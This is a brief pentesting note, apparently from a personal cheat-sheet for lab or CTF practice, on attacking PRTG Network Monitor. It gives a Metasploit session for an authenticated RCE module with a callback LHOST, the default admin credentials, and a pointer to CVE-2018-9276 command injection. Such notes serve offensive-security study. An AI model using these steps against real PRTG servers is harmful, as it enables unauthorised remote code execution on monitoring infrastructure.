PRTG Network Monitor

attacking_common_applications netmon

Paessler PRTG is an network monitoring software. On Windows, there are two folders, one for the program, another for the data:

C:\Program Files (x86)\PRTG Network Monitor
C:\ProgramData\Paessler\PRTG Network Monitor

If we have admin access, we can exploit a RCE.

For instance, with metasploit:

$ msfconsole -q
msf6> use windows/http/prtg_authenticated_rce
msf6> set RHOSTS <ip>
msf6> set LHOST tun0
msf6> run # try default password
msf6> set ADMIN_PASSWORD <password>
msf6> run

πŸ‘» To-do πŸ‘»

Stuff that I found, but never read/used yet.

  • Default credentials (prtgadmin:prtgadmin)
  • Nmap (Indy httpd <version>)
  • CVE-2018-9276 (<18.2.39): command injection (poc)